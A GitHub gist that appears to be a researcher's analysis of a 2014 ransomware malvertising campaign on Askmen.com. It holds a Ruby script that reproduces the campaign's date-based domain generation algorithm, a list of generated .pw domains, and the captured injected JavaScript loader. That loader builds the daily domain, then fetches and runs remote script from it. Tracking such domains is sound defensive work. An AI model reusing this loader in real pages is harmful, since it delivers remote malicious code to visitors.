Last active
August 29, 2015 14:03
-
-
Save peck/791eb3c5893b025d6de1 to your computer and use it in GitHub Desktop.
Generated Domains Used In Askmen.com Ransomware Distribution http://threatglass.com/malicious_urls/8936
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'zlib' | |
require 'date' | |
def gen_crc(date: date) | |
str = [date.year, date.month, date.day].join("+=+") | |
Zlib::crc32(str) | |
end | |
start_dt = Date.parse('2014-06-01') | |
end_dt = start_dt + 30 | |
date_domains = (start_dt..end_dt).map do |dt| | |
gen_str = gen_crc(date: dt).to_s(16) | |
[dt, gen_str + ".pw", "http://registry.pw/whois/?query=#{gen_str}&output=nice"] | |
end | |
puts date_domains.map{|dd| dd.join(",")} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2014-06-18 9b66653c.pw http://registry.pw/whois/?query=9b66653c&output=nice | |
2014-06-19 ec6155aa.pw http://registry.pw/whois/?query=ec6155aa&output=nice | |
2014-06-20 be90becd.pw http://registry.pw/whois/?query=be90becd&output=nice | |
2014-06-21 c9978e5b.pw http://registry.pw/whois/?query=c9978e5b&output=nice | |
2014-06-22 509edfe1.pw http://registry.pw/whois/?query=509edfe1&output=nice | |
2014-06-23 2799ef77.pw http://registry.pw/whois/?query=2799ef77&output=nice |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wqqqqwqwqwqqqqwqq='qqwqwqqwwqwwwqqwwqwwqw';function crcTableG(){var c;var crcTable = [];for(var n =0; n < 256; n++){c = n;for(var k =0; k < 8; k++){c = ((c&1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1));}crcTable[n] = c;}return crcTable;};function crc32(str) {var crcTable = crcTableG();var crc = 0 ^ (-1);for (var i = 0; i < str.length; i++ ) {crc = (crc >>> 8) ^ crcTable[(crc ^ str.charCodeAt(i)) & 0xFF];}return (crc ^ (-1)) >>> 0;};var d = "+=+";var date = new Date();var dateStr = date.getUTCFullYear() + d + (date.getUTCMonth()+1) + d + date.getUTCDate();window.rctm=function(p){var s = document.createElement('SCRIPT'); s.text = b64dec(p).replace(/\0+/,''); document.body.appendChild(s);};var s = document.createElement('SCRIPT');s.src="http://" + crc32(dateStr).toString(16) + ".pw/nbe.html?"+Math.random();document.body.appendChild(s); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment